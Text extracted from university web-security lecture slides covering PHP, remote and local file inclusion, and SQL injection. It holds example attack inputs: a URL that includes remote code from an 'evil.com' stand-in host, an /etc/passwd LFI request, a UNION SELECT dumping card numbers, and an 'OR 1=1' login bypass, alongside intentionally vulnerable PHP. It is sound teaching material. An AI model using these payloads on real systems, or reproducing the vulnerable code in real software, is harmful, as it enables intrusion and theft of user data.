![Page 122: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/122.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 SummaryAttacks on Servers 55/74
![Page 123: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/123.jpg)
Attacks on Servers
Server-side scripts execute code on the server to generatedynamic pages.
Written in php, perl, Java Servlets, . . . .
Access databases, . . . .
Attacks on Servers 56/74
![Page 124: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/124.jpg)
Generating Dynamic Content
Alice
php
mysql
![Page 125: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/125.jpg)
Generating Dynamic Content
Alice
php
mysql
connect
![Page 126: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/126.jpg)
Generating Dynamic Content
Alice
php
mysql
<html>...</html>
![Page 127: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/127.jpg)
Generating Dynamic Content
Alice
php
mysql
name=Alice,pw=love
![Page 128: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/128.jpg)
Generating Dynamic Content
Alice
php
mysql
name=Alice,pw=love
![Page 129: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/129.jpg)
Generating Dynamic Content
Alice
php
mysql
SELECT...
![Page 130: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/130.jpg)
Generating Dynamic Content
Alice
php
mysql
data
![Page 131: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/131.jpg)
Generating Dynamic Content
Alice
php
mysql
<html>...</html>
![Page 132: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/132.jpg)
Generating Dynamic Content
Alice
php
mysql
<html>...</html>
Attacks on Servers 57/74
![Page 133: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/133.jpg)
PHP
<?php insert code here ?>.
$ GET[variable] — array of GET input variables.
No typing.✞ ☎
<HTML><BODY>
Your number : <?php echo $x=$ GET [ ’ number ’ ] ; ? > .Square i s <?pho $y=$x∗$x ; echo $y ; ? > .
</BODY></HTML>✝ ✆
Attacks on Servers 58/74
![Page 134: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/134.jpg)
PHP. . .
Assume the GET variable number is 5, then PHP will generatethis page:
✞ ☎
<HTML><BODY>
Your number : 5 .Square i s 2 5 .
</BODY></HTML>✝ ✆
Attacks on Servers 59/74
![Page 135: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/135.jpg)
Remote File Inclusion (RFI)
Let this be index.php:✞ ☎
<?phpi n c l u d e ( ” header . html” ) ;i n c l u d e ( ”$ GET [ ’ page ’ ] . ” . php” ) ;i n c l u d e ( ” f o o t e r . html” ) ;
?>✝ ✆
A user can go to www.cnn.com/index.php?page=news and a news page isgenerated.An attacker can go to✞ ☎ht tp : // cnn . com/ i ndex . php ? page=http : // e v i l . com/ e v i l c o d e
✝ ✆
forcing the server to include and execute the remote fileevilcode.php.
Most sites now forbid RFI.
Attacks on Servers 60/74
![Page 136: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/136.jpg)
Local File Inclusion (LFI)
As RFI, but a local file gets executed✞ ☎
h t tp : //www. cnn . com/ i n d e x . php? page=se c r e t p a ge✝ ✆
Getting the password file:✞ ☎
h t tp : //www. cnn . com/ i n d e x . php? page=/e t c /passwd%00✝ ✆
%00 is a null byte, effectively removing the .php extension.
Attacks on Servers 61/74
![Page 137: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/137.jpg)
Local File Inclusion (LFI). . .
Attack: The attacker1 uploads a file (a php script hiding as a .jpg file, for example).2 tricks the site to execute the uploaded file using LFI.
Eve
flicker.com
![Page 138: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/138.jpg)
Local File Inclusion (LFI). . .
Attack: The attacker1 uploads a file (a php script hiding as a .jpg file, for example).2 tricks the site to execute the uploaded file using LFI.
Eve
flicker.com
boat.jpg✞ ☎<?php . . . ? >✝ ✆
![Page 139: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/139.jpg)
Local File Inclusion (LFI). . .
Attack: The attacker1 uploads a file (a php script hiding as a .jpg file, for example).2 tricks the site to execute the uploaded file using LFI.
Eve
flicker.com
flicker.com/index.php?page=pics/boat.jpg
Attacks on Servers 62/74
![Page 140: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/140.jpg)
Local File Inclusion (LFI). . .
For example, Nasvir Nagra’s Visualize program
http://search.cpan.org/~jnagra/Perl-Visualize-1.02/Visualize.pm
can embed a perl script into a gif file, so that the file isboth an image and an executable program.
Attacks on Servers 63/74
![Page 141: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/141.jpg)
Accessing a Backend Database
Alice
php
mysql
![Page 142: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/142.jpg)
Accessing a Backend Database
Alice
php
mysql
name=Alice,pw=love
![Page 143: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/143.jpg)
Accessing a Backend Database
Alice
php
mysql
name=Alice,pw=love
![Page 144: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/144.jpg)
Accessing a Backend Database
Alice
php
mysql
SELECT...
![Page 145: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/145.jpg)
Accessing a Backend Database
Alice
php
mysql
data
Attacks on Servers 64/74
![Page 146: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/146.jpg)
SQL tables
SQL databases store records as tables:
id title author body
1 Databases John Story 1
2 Computers Joe Story 2
3 Security Jane Story 3
4 Technology Julia Story 4
Attacks on Servers 65/74
![Page 147: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/147.jpg)
SQL commands
SQL commands for accessing a relational database:
SELECT extract records from tables
INSERT insert new records in a table
UPDATE alter a record in a table
DELETE remove a record in a table
UNION combine the results of multiple queries
Attacks on Servers 66/74
![Page 148: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/148.jpg)
SQL queries
id title author body
1 Databases John Story 1
2 Computers Joe Story 2
3 Security Jane Story 3
4 Technology Julia Story 4
SELECT * FROM news WHERE id = 3
SELECT body FROM news WHERE author = "joe"
Attacks on Servers 67/74
![Page 149: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/149.jpg)
SQL Injection Attack
✞ ☎
<?php$query = ’SELECT ∗ FROM news WHERE id=’ . $ GET [ ’ i d ’ ] ;$out = mysq l que ry ( $query ) ;echo ”<u l>”whi le ( $row = my s q l f e t c h a r r a y ( $out ) ) {
echo ” < l i >” . $row [ ’ i d ’ ] ;echo ” < l i >” . $row [ ’ t i t l e ’ ] ;echo ” < l i >” . $row [ ’ au tho r ’ ] ;echo ” < l i >” . $row [ ’ body ’ ] ;
}echo ”</u l>”
?>✝ ✆
Attacks on Servers 68/74
![Page 150: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/150.jpg)
SQL Injection Attack. . .
Consider this URL:✞ ☎
h t tp : //www. cnn . com/news . php? i d=3✝ ✆
The query would1 extract the 3rd news article,2 generate an HTML page, and3 send it to the user.
Attacks on Servers 69/74
![Page 151: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/151.jpg)
SQL Injection Attack. . .
Consider instead✞ ☎
h t tp : //www. cnn . com/news . php? i d=NULL UNIONSELECT cardno , f i r s t , l a s t , ema i l FROM u s e r s
✝ ✆
Since the PHP code is✞ ☎
<?php$query=’SELECT ∗ FROM news WHERE id=’ . $ GET [ ’ i d ’ ] ;. . .
?>✝ ✆
this would force the server to execute✞ ☎
SELECT ∗ FROM news WHERE id=NULL UNIONSELECT cardno , f i r s t , l a s t , ema i l FROM u s e r s
✝ ✆
revealing all account information.
Attacks on Servers 70/74
![Page 152: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/152.jpg)
SQL Injection — Bypassing Authentication
Consider this server-side login script:✞ ☎
<?php$query = ’SELECT ∗ FROM news
WHERE ema i l=’ . $ POST [ ’ ema i l ’ ] . ’ ” ’ .’AND pwdhash=” ’ . hash ( ’ sha256 ’ , $ POST [ ’ password ’ ] ) . ’ ” ’
i f ( mysq l num rows ( $out )>0) {echo ” Log in s u c c e s s f u l ! ” ;
} e l s e {$a c c e s s = f a l s e ;echo ” Log in f a i l e d ” ;
}?>✝ ✆
Attacks on Servers 71/74
![Page 153: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/153.jpg)
SQL Injection — Bypassing Authentication
Let the attacker enter this into the login form:
email="OR 1=1;--
password=(empty)
Then, the original query✞ ☎
SELECT ∗ FROM news WHERE ema i l=’ . $ POST [ ’ ema i l ’ ] . ’ ” ’ .’AND pwdhash=” ’ . hash ( ’ sha256 ’ , $ POST [ ’ password ’ ] ) . ’ ” ’
✝ ✆
turns into✞ ☎
SELECT ∗ FROM news WHERE ema i l=””OR 1=1; −− AND pwdhash = . . .✝ ✆
Note that -- is PHP’s comment character.
The query returns the entire user table to the attacker.
Attacks on Servers 72/74
![Page 154: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/154.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 SummarySummary 73/74
![Page 155: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/155.jpg)
Readings and References
Chapter 7 in Introduction to Computer Security, by Goodrichand Tamassia.
Summary 74/74